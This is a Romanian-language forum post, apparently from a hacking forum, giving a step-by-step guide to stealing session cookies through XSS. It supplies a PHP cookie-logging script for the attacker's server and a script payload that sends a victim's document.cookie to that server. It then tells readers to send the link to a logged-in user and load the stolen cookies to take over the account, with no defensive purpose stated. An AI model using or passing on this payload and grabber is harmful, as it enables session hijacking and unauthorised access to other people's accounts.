Leaderboard

Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag. XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele. Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php: <?php $cookie = $HTTP_GET_VARS["cgrab"]; $fh = fopen('cookies.txt', 'a'); fwrite($fh, $cookie . "\n\n"); ?> Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write. Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma <script>alert('xss')</script>. Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta: <script>document.location="http://www.site-ulmeu.com/grab.php?cgrab=" + document.cookie;</script> trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txt trebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau.